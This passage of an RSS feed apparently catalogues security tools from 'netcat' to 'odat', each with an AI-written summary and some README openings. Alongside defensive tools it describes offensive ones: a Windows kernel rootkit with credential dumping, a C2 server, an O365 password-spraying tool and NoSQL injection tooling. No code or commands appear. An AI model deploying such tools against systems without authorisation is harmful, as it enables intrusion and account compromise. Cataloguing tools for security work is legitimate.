 &lt;a href="https://nth.skerritt.blog"&gt;Web App with no install needed&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>netcat</title><link>https://rainmana.github.io/hackyfeed/tools/diegocr-netcat/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/diegocr-netcat/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Netcat for Windows is a TCP/IP utility designed for network diagnostics and exploration, functioning as a versatile &amp;ldquo;Swiss Army knife&amp;rdquo; for admins on the Windows platform. It supports both inbound and outbound connections over TCP or UDP, features built-in port scanning, DNS checks, and allows for custom local network configurations. Notably, this version excludes the potentially insecure -e switch to mitigate false positives from antivirus software, while also resolving issues encountered during telnet sessions.&lt;/p&gt;</description></item><item><title>NetExec</title><link>https://rainmana.github.io/hackyfeed/tools/pennyw0rth-netexec/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/pennyw0rth-netexec/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; NetExec is a community-driven network exploitation tool derived from the predecessor CrackMapExec, designed to facilitate network enumeration and execution of various tasks across multiple hosts. It boasts functionalities for maintaining and expanding the original tool&amp;rsquo;s capabilities, alongside regular updates and community contributions. Notable features include an emphasis on user collaboration, a dedicated Discord channel for support, and extensive documentation in development.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;img src="https://img.shields.io/badge/python-3.10+-blue.svg" alt="Supported Python versions"&gt;
&lt;a href="https://twitter.com/intent/follow?screen_name=al3x_n3ff"&gt;&lt;img src="https://img.shields.io/twitter/follow/al3xn3ff?label=al3x_n3ff&amp;amp;style=social" alt="Twitter"&gt;&lt;/a&gt;
&lt;a href="https://twitter.com/intent/follow?screen_name=_zblurx"&gt;&lt;img src="https://img.shields.io/twitter/follow/_zblurx?label=_zblurx&amp;amp;style=social" alt="Twitter"&gt;&lt;/a&gt;
&lt;a href="https://twitter.com/intent/follow?screen_name=MJHallenbeck"&gt;&lt;img src="https://img.shields.io/twitter/follow/MJHallenbeck?label=MJHallenbeck&amp;amp;style=social" alt="Twitter"&gt;&lt;/a&gt;
&lt;a href="https://twitter.com/intent/follow?screen_name=mpgn_x64"&gt;&lt;img src="https://img.shields.io/twitter/follow/mpgn_x64?label=mpgn_x64&amp;amp;style=social" alt="Twitter"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;🚩 This is the open source repository of NetExec maintained by a community of passionate people&lt;/p&gt;</description></item><item><title>netlas-cookbook</title><link>https://rainmana.github.io/hackyfeed/tools/netlas-io-netlas-cookbook/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/netlas-io-netlas-cookbook/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Netlas Cookbook serves as a comprehensive guide for utilizing Netlas Search Tools, aimed at audiences with varying levels of cybersecurity knowledge. It provides practical examples and automation techniques for searching and analyzing IP addresses and domain data on the Internet, while also detailing the use of the Netlas API for advanced queries and OSINT tasks. Key features include search query syntax explanation, logical operators, and integration with Python, enhancing user capabilities in attack surface management and information retrieval.&lt;/p&gt;</description></item><item><title>NETReactorSlayer</title><link>https://rainmana.github.io/hackyfeed/tools/sychicboy-netreactorslayer/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/sychicboy-netreactorslayer/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; NETReactorSlayer is an open-source deobfuscator and unpacker specifically designed for Eziriz .NET Reactor, facilitating the process of reversing obfuscated .NET applications. This tool offers both a graphical user interface (GUI) and a command-line interface (CLI), enabling flexible usage depending on user preference. Notable features include comprehensive documentation, community contributions, and adherence to the GPLv3 license, ensuring wide accessibility and support for developers.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;img alt="NETReactorSlayer Logo" src="./Images/Logo-Dark.png#gh-dark-mode-only" width="1000" /&gt;
 &lt;img alt="NETReactorSlayer Logo" src="./Images/Logo-Light.png#gh-light-mode-only" width="1000" /&gt;
&lt;/p&gt;
&lt;h1 id="netreactorslayer"&gt;.NETReactorSlayer &lt;br /&gt; &lt;a href="https://github.com/SychicBoy/NETReactorSlayer/actions"&gt; &lt;img src="https://github.com/SychicBoy/NETReactorSlayer/actions/workflows/build.yml/badge.svg"&gt;&lt;/img&gt; &lt;a href="https://github.com/SychicBoy/NETReactorSlayer/actions"&gt; &lt;img src="https://github.com/SychicBoy/NETReactorSlayer/actions/workflows/codeql-analysis.yml/badge.svg"&gt;&lt;/img&gt; &lt;/a&gt; &lt;/a&gt; &lt;a href="https://github.com/SychicBoy/NETReactorSlayer/releases/latest"&gt; &lt;img src="https://img.shields.io/github/v/release/SychicBoy/NETReactorSlayer"&gt;&lt;/img&gt; &lt;/a&gt; &lt;a href="#"&gt; &lt;img src="https://img.shields.io/github/downloads/SychicBoy/NETReactorSlayer/total"&gt;&lt;/img&gt; &lt;/a&gt; &lt;a href="#license"&gt; &lt;img src="https://img.shields.io/github/license/SychicBoy/NETReactorSlayer"&gt;&lt;/img&gt; &lt;/a&gt; &lt;a href="https://github.com/SychicBoy/NETReactorSlayer/commits/master"&gt; &lt;img src="https://img.shields.io/github/last-commit/SychicBoy/NETReactorSlayer"&gt;&lt;/img&gt; &lt;/a&gt;&lt;/h1&gt;
&lt;p&gt;NETReactorSlayer is an open source (GPLv3) deobfuscator and unpacker for &lt;a href="https://www.eziriz.com/reactor_download.htm"&gt;Eziriz .NET Reactor&lt;/a&gt;.
&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;</description></item><item><title>Nettacker</title><link>https://rainmana.github.io/hackyfeed/tools/owasp-nettacker/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/owasp-nettacker/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; OWASP Nettacker is an automated penetration testing and information-gathering framework designed for cybersecurity professionals to conduct reconnaissance, vulnerability assessments, and network security audits. Key features include a modular architecture for customizable task execution, support for multi-protocol and multithreaded scanning, comprehensive output formats, and a user-friendly interface for managing scans, all of which enhance its efficacy in identifying weaknesses across diverse systems and applications.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="owasp-nettacker"&gt;OWASP Nettacker&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://github.com/OWASP/Nettacker/actions/workflows/ci_cd.yml/badge.svg?branch=master"&gt;&lt;img src="https://github.com/OWASP/Nettacker/actions/workflows/ci_cd.yml/badge.svg?branch=master" alt="Build Status"&gt;&lt;/a&gt;
&lt;a href="https://github.com/OWASP/Nettacker/blob/master/LICENSE"&gt;&lt;img src="https://img.shields.io/badge/License-Apache%20v2-green.svg" alt="Apache License"&gt;&lt;/a&gt;
&lt;a href="https://twitter.com/iotscan"&gt;&lt;img src="https://img.shields.io/badge/Twitter-@iotscan-blue.svg" alt="Twitter"&gt;&lt;/a&gt;
&lt;img src="https://img.shields.io/github/contributors/OWASP/Nettacker" alt="GitHub contributors"&gt;
&lt;a href="https://nettacker.readthedocs.io/en/latest/?badge=latest"&gt;&lt;img src="https://readthedocs.org/projects/nettacker/badge/?version=latest" alt="Documentation Status"&gt;&lt;/a&gt;
&lt;a href="https://github.com/OWASP/Nettacker"&gt;&lt;img src="https://img.shields.io/github/repo-size/OWASP/Nettacker" alt="repo size "&gt;&lt;/a&gt;
&lt;a href="https://hub.docker.com/r/owasp/nettacker"&gt;&lt;img src="https://img.shields.io/docker/pulls/owasp/nettacker" alt="Docker Pulls"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>NeuroSploit</title><link>https://rainmana.github.io/hackyfeed/tools/joasasantos-neurosploit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/joasasantos-neurosploit/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; NeuroSploit v3 is an AI-powered penetration testing platform designed for autonomous security assessments, offering support for 100 vulnerability types within isolated Kali Linux containers. Key features include an autonomous agent for parallel testing, an exploit chain engine, anti-hallucination controls, real-time monitoring via a modern web interface, and multi-provider LLM integration for adaptive scanning strategies. The tool provides efficient scanning capabilities and detailed reporting, making it suitable for comprehensive security evaluations.&lt;/p&gt;</description></item><item><title>Nginx-Lua-Anti-DDoS</title><link>https://rainmana.github.io/hackyfeed/tools/c0nw0nk-nginx-lua-anti-ddos/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/c0nw0nk-nginx-lua-anti-ddos/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Nginx-Lua-Anti-DDoS is a protective tool designed for Nginx web servers, leveraging Lua scripting to mitigate DDoS attacks through a JavaScript-based authentication puzzle inspired by Cloudflare&amp;rsquo;s &amp;ldquo;I&amp;rsquo;m Under Attack&amp;rdquo; mode. The tool features automatic detection and activation of protection mechanisms against various attack types, extensive IP and User-Agent filtering options, as well as capabilities to inspect and block malicious HTTP requests. With no limitation on attack size and built-in logging for monitoring, it offers customizable error responses and caching optimizations to enhance web server performance during attacks.&lt;/p&gt;</description></item><item><title>ngrev</title><link>https://rainmana.github.io/hackyfeed/tools/mgechev-ngrev/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mgechev-ngrev/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; ngrev is a graphical tool designed for the reverse engineering of Angular projects, enabling users to navigate application structures and visualize the relationships between modules, providers, and directives through static code analysis, eliminating the need to execute the application. Notable features include support for custom theming, compatibility with Angular&amp;rsquo;s Ivy compiler, and integration with Angular CLI for streamlined project selection.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="ngrev"&gt;ngrev&lt;/h1&gt;
&lt;p align="center"&gt;
 &lt;img src="https://raw.githubusercontent.com/mgechev/ngrev/master/src/assets/icons/favicon.512x512.png" alt="ngrev" width="250"&gt;
&lt;/p&gt;
&lt;p&gt;Graphical tool for reverse engineering of Angular projects. It allows you to navigate in the structure of your application and observe the relationship between the different modules, providers, and directives. The tool performs &lt;strong&gt;static code analysis&lt;/strong&gt; which means that you &lt;strong&gt;don&amp;rsquo;t have to run your application&lt;/strong&gt; in order to use it.&lt;/p&gt;</description></item><item><title>Nidhogg</title><link>https://rainmana.github.io/hackyfeed/tools/idov31-nidhogg/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/idov31-nidhogg/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Nidhogg is a versatile kernel-level rootkit designed for Windows 10 and 11, enabling a wide array of operations directly from kernel space. Its primary use case is to facilitate stealthy and powerful control over system processes, threads, files, and registry items, featuring advanced capabilities such as process hiding, memory scanner bypassing, and credential dumping. Notable features include a built-in AMSI bypass, support for reflective loading, and a Nidhogg Object File (NOF) for custom kernel-mode code execution, enhancing its integration with command-and-control (C2) frameworks.&lt;/p&gt;</description></item><item><title>nishang</title><link>https://rainmana.github.io/hackyfeed/tools/samratashok-nishang/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/samratashok-nishang/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Nishang is a comprehensive PowerShell framework designed for offensive security, penetration testing, and red teaming, featuring a collection of scripts and payloads that assist in various stages of penetration testing. It allows users to execute scripts in memory to bypass antivirus detection and includes notable functionalities such as encoding commands, webshell capabilities, and Active Directory manipulation tools. The framework is structured for ease of use with PowerShell, offering detailed help for individual scripts and versatile execution methods.&lt;/p&gt;</description></item><item><title>nmap</title><link>https://rainmana.github.io/hackyfeed/tools/ullaakut-nmap/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ullaakut-nmap/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Ullaakut/nmap library offers Go developers a comprehensive interface to leverage the features of the Nmap network scanner within their applications, facilitating the creation of security audit tools. By utilizing the Go language&amp;rsquo;s capabilities, the library allows for robust network scans, service detection, and easy parsing of XML outputs produced by the Nmap binary. Notable features include support for various scan types and the ability to manage scan timeouts, enhancing both flexibility and performance in penetration testing scenarios.&lt;/p&gt;</description></item><item><title>nmap-formatter</title><link>https://rainmana.github.io/hackyfeed/tools/vdjagilev-nmap-formatter/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/vdjagilev-nmap-formatter/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; NMAP-Formatter is a versatile tool designed to convert NMAP XML output into various formats such as HTML, CSV, JSON, Excel, and more, facilitating the analysis and reporting of network scan results. Notable features include support for output via stdin, the ability to generate diagrams using Graphviz, and options to skip down hosts, enhancing usability for security professionals and network administrators. This tool can also be utilized as a library in Golang for integration into other applications.&lt;/p&gt;</description></item><item><title>nocom-explanation</title><link>https://rainmana.github.io/hackyfeed/tools/nerdsinspace-nocom-explanation/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nerdsinspace-nocom-explanation/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; No Comment is a tool designed for analyzing and visualizing gameplay data, specifically focusing on tracking player movements and in-game events within the Minecraft server 2b2t. Its primary use case is to create detailed heatmaps and monitor activity trends, enabling users to comprehend the dynamics of player interactions and exploit occurrences. Notable features include high-resolution visual outputs of player activities and integration with community resources for enhanced data representation.&lt;/p&gt;</description></item><item><title>nodepass</title><link>https://rainmana.github.io/hackyfeed/tools/nodepassproject-nodepass/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nodepassproject-nodepass/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; NodePass is an open-source network tunneling solution that provides enterprise-grade TCP/UDP tunneling with minimal configuration and high performance, designed for managing complex network scenarios. Key features include seamless protocol conversion, a connection pooling architecture for reduced latency, multi-level TLS security mechanisms, and real-time monitoring capabilities. The tool targets DevOps professionals and system administrators, facilitating effortless deployment and control in diverse networking conditions.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div align="center"&gt;
 &lt;img src="https://nodepass.eu/assets/np-gopher.png" width="300"&gt;
&lt;p&gt;&lt;a href="https://github.com/avelino/awesome-go#networking"&gt;&lt;img src="https://awesome.re/mentioned-badge.svg" alt="Mentioned in Awesome Go"&gt;&lt;/a&gt;
&lt;a href="https://github.com/NodePassProject/nodepass/releases"&gt;&lt;img src="https://img.shields.io/github/v/release/NodePassProject/nodepass" alt="GitHub release"&gt;&lt;/a&gt;
&lt;a href="https://github.com/NodePassProject/nodepass/releases"&gt;&lt;img src="https://img.shields.io/github/downloads/NodePassProject/nodepass/total.svg" alt="GitHub downloads"&gt;&lt;/a&gt;
&lt;a href="https://goreportcard.com/report/github.com/NodePassProject/nodepass"&gt;&lt;img src="https://goreportcard.com/badge/github.com/NodePassProject/nodepass" alt="Go Report Card"&gt;&lt;/a&gt;
&lt;a href="https://opensource.org/licenses/BSD-3-Clause"&gt;&lt;img src="https://img.shields.io/badge/License-BSD_3--Clause-blue.svg" alt="License"&gt;&lt;/a&gt;
&lt;a href="https://pkg.go.dev/github.com/NodePassProject/nodepass"&gt;&lt;img src="https://pkg.go.dev/badge/github.com/NodePassProject/nodepass.svg" alt="Go Reference"&gt;&lt;/a&gt;
&lt;a href="https://deepwiki.com/NodePassProject/nodepass"&gt;&lt;img src="https://deepwiki.com/badge.svg" alt="Ask DeepWiki"&gt;&lt;/a&gt;
&lt;img src="https://img.shields.io/github/last-commit/NodePassProject/nodepass" alt="GitHub last commit"&gt;&lt;/p&gt;</description></item><item><title>noir</title><link>https://rainmana.github.io/hackyfeed/tools/owasp-noir-noir/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/owasp-noir-noir/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; OWASP Noir is a security tool designed to analyze source code and generate comprehensive inventories of application endpoints, including the detection of shadow APIs and hidden routes that traditional methods might overlook. It serves as a bridge between Static Application Security Testing (SAST) and Dynamic Application Security Testing (DAST), enabling white-box security teams and penetration testers to identify the complete attack surface of an application. Notable features include AI-powered analysis across various programming languages, integration capabilities with popular DAST tools, and the ability to output results in multiple formats for seamless workflow integration.&lt;/p&gt;</description></item><item><title>nomore403</title><link>https://rainmana.github.io/hackyfeed/tools/devploit-nomore403/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/devploit-nomore403/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; NoMore403 is a specialized tool for cybersecurity professionals aimed at bypassing HTTP 40X errors during web security assessments. It employs multiple techniques such as header manipulation, method tampering, and custom path testing to automate the bypass process, featuring smart output filtering to highlight significant results and high concurrency for efficient testing. Notable capabilities include auto-calibration, deduplication of results, color-coded output, and customizable payloads for enhanced flexibility.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;img src="https://i.imgur.com/F4D1zhr.png" width="350" height="200" alt="logo"&gt;
&lt;/p&gt;
&lt;h1 align="center"&gt;NoMore403&lt;/h1&gt;
&lt;p align="center"&gt;
 &lt;a href="https://github.com/devploit/nomore403/stargazers"&gt;&lt;img alt="GitHub stars" src="https://img.shields.io/github/stars/devploit/nomore403?style=flat&amp;logo=github"&gt;&lt;/a&gt;
 &lt;a href="https://github.com/devploit/nomore403/forks"&gt;&lt;img alt="GitHub forks" src="https://img.shields.io/github/forks/devploit/nomore403?style=flat&amp;logo=github"&gt;&lt;/a&gt;
 &lt;a href="https://goreportcard.com/report/github.com/devploit/nomore403"&gt;&lt;img alt="Go Report Card" src="https://goreportcard.com/badge/github.com/devploit/nomore403"&gt;&lt;/a&gt;
 &lt;img alt="Go version" src="https://img.shields.io/badge/go-1.24-blue"&gt;
 &lt;img alt="License: MIT" src="https://img.shields.io/badge/license-MIT-green"&gt;
 &lt;img alt="Contributions welcome" src="https://img.shields.io/badge/contributions-welcome-brightgreen.svg"&gt;
&lt;/p&gt;</description></item><item><title>Nope-Proxy</title><link>https://rainmana.github.io/hackyfeed/tools/summitt-nope-proxy/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/summitt-nope-proxy/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; NoPE Proxy is a Burp Suite extension that facilitates the interception and analysis of TCP and UDP traffic, including non-HTTP protocols. Its notable features include a configurable DNS server that routes traffic to Burp, support for multiple listening ports for man-in-the-middle (MiTM) connections, and the ability to define match and replace rules for traffic manipulation. This tool is especially useful for security testing of mobile applications and thick clients, allowing seamless traffic analysis and modification.&lt;/p&gt;</description></item><item><title>noseyparker</title><link>https://rainmana.github.io/hackyfeed/tools/praetorian-inc-noseyparker/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/praetorian-inc-noseyparker/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Nosey Parker is a command-line interface (CLI) tool designed for scanning textual data to identify secrets and sensitive information, essentially functioning as a specialized &lt;code&gt;grep&lt;/code&gt; for secret detection. Targeted primarily at offensive security operations, it offers features such as flexible scanning of various data sources, usage of 188 precision-focused regex rules, deduplication of matches to streamline review processes, and high-speed scanning capabilities, making it suitable for large-scale security engagements. Note that Nosey Parker has been officially retired and replaced by the tool Titus.&lt;/p&gt;</description></item><item><title>NoSQLMap</title><link>https://rainmana.github.io/hackyfeed/tools/codingo-nosqlmap/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/codingo-nosqlmap/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; NoSQLMap is a Python tool designed for auditing and automating injection attacks on NoSQL databases, primarily targeting MongoDB and CouchDB, while also preparing for support of others like Redis and Cassandra. It helps identify and exploit default configuration vulnerabilities to disclose or replicate database data through a user-friendly menu-based interface. Key features include options for NoSQL DB access attacks, web application attacks, and scanning for anonymous MongoDB access.&lt;/p&gt;</description></item><item><title>npq</title><link>https://rainmana.github.io/hackyfeed/tools/lirantal-npq/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/lirantal-npq/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; npq is a tool designed to audit npm packages prior to installation, enhancing security during the package management process. It performs multiple checks, including vulnerability assessments using the Snyk database, package age, popularity metrics, and the presence of essential documentation files. Notable features include an auto-continue mode after warnings and customizable settings for strict security reviews.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;npq allows you to audit npm packages &lt;em&gt;before&lt;/em&gt; you install them&lt;/p&gt;</description></item><item><title>nuclei-wordfence-cve</title><link>https://rainmana.github.io/hackyfeed/tools/topscoder-nuclei-wordfence-cve/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/topscoder-nuclei-wordfence-cve/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Nuclei + Wordfence CVE project provides a comprehensive set of 71,889 Nuclei templates specifically designed for assessing security vulnerabilities in WordPress, including core, plugins, and themes. Notably, the templates are regularly updated to reflect the latest threats identified by Wordfence, offering users a robust tool for proactive site protection and vulnerability identification. This open-source solution allows for customization, giving users the flexibility to adapt templates to meet specific security needs.&lt;/p&gt;</description></item><item><title>o365recon</title><link>https://rainmana.github.io/hackyfeed/tools/nyxgeek-o365recon/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nyxgeek-o365recon/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; o365recon is a PowerShell script designed for retrieving information from Office 365 and Azure AD using valid credentials. Its primary use case is to facilitate information gathering for security assessments, with a notable feature allowing optional Azure querying through a simple command-line interface. The tool requires the installation of MSOnline and AzureAD modules and includes support for multi-factor authentication.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="o365recon"&gt;o365recon&lt;/h1&gt;
&lt;p&gt;script to retrieve information via O365 and AzureAD with a valid cred&lt;/p&gt;</description></item><item><title>o365spray</title><link>https://rainmana.github.io/hackyfeed/tools/0xzdh-o365spray/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/0xzdh-o365spray/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; o365spray is a specialized tool for username enumeration and password spraying targeting Microsoft Office 365 (O365) environments. It allows users to validate domains, enumerate usernames, and conduct password spraying attacks, featuring configurable options for lockout policies and enumeration modules. The tool emphasizes caution by automatically managing lockout timers during operations to mitigate potential account lockouts.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="o365spray"&gt;o365spray&lt;/h1&gt;
&lt;p&gt;o365spray is a username enumeration and password spraying tool aimed at Microsoft Office 365 (O365). This tool reimplements a collection of enumeration and spray techniques researched and identified by those mentioned in &lt;a href="#Acknowledgments"&gt;Acknowledgments&lt;/a&gt;.&lt;/p&gt;</description></item><item><title>obfuscator</title><link>https://rainmana.github.io/hackyfeed/tools/es3n1n-obfuscator/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/es3n1n-obfuscator/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Obfuscator is a native C++23 code obfuscation tool designed to enhance software security by transforming executable code through various methods such as bogus control flow and constant encryption. Its primary use case is to protect applications from decompilation and reverse engineering, making it compatible with popular disassemblers like IDA and Ghidra. Notable features include customizable function and transform configurations, support for both Linux and Windows platforms, and the ability to specify additional debugging information through PDB and MAP files.&lt;/p&gt;</description></item><item><title>obfuscator-io-deobfuscator</title><link>https://rainmana.github.io/hackyfeed/tools/ben-sb-obfuscator-io-deobfuscator/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ben-sb-obfuscator-io-deobfuscator/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Obfuscator.io Deobfuscator is a tool designed to reverse the obfuscation applied by Obfuscator.io, enabling the recovery of original scripts. Its primary use case is to facilitate code analysis and debugging by recovering strings, removing unnecessary code, and simplifying complex structures without executing untrusted code. Notable features include automatic configuration detection, improved readability through control flow restoration, and compatibility with various forks of the original obfuscator.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="obfuscatorio-deobfuscator"&gt;Obfuscator.io Deobfuscator&lt;/h1&gt;
&lt;p&gt;A deobfuscator for scripts obfuscated by Obfuscator.io&lt;/p&gt;</description></item><item><title>obliteration</title><link>https://rainmana.github.io/hackyfeed/tools/obhq-obliteration/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/obhq-obliteration/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Obliteration is an open-source PlayStation 4 kernel reimplementation in Rust, designed to enable the execution of dumped PlayStation 4 system software on various operating systems, including Windows, Linux, and macOS. Notable features include cross-platform support with native binaries, near-native performance leveraging hypervisor technologies, and a kernel architecture aimed to closely resemble the original PlayStation 4 kernel for enhanced compatibility. Currently, the project is in early development and does not yet support game execution.&lt;/p&gt;</description></item><item><title>obsidian-osint-templates</title><link>https://rainmana.github.io/hackyfeed/tools/webbreacher-obsidian-osint-templates/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/webbreacher-obsidian-osint-templates/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Obsidian OSINT Templates provide structures and frameworks for organizing data during Open Source Intelligence (OSINT) investigations using the Obsidian notetaking tool. Notable features include customizable templates designed to enhance data recording and connection-making, which facilitate efficient analysis and documentation of investigative findings. This resource aims to support both new and experienced users in effectively leveraging Obsidian for their OSINT needs.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="obsidian-osint-templates"&gt;obsidian-osint-templates&lt;/h1&gt;
&lt;blockquote&gt;
&lt;p&gt;[!info] License
Copyright (c) 2024 Micah Hoffman&lt;/p&gt;</description></item><item><title>Octopus</title><link>https://rainmana.github.io/hackyfeed/tools/mhaskar-octopus/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mhaskar-octopus/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Octopus is an open-source, pre-operation command-and-control (C2) server developed in Python, designed for red team operations to facilitate initial attacks and information gathering before launching full engagements. It features secure communications through AES-256 encryption, remote command execution, file transfers, and a unique Endpoint Situational Awareness (ESA) capability that allows users to assess target environments effectively. The tool supports multiple Windows versions and enables stealthy operations, making it less detectable by conventional security measures.&lt;/p&gt;</description></item><item><title>odat</title><link>https://rainmana.github.io/hackyfeed/tools/quentinhardy-odat/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/quentinhardy-odat/</guid><description>&lt;blockquote&gt;
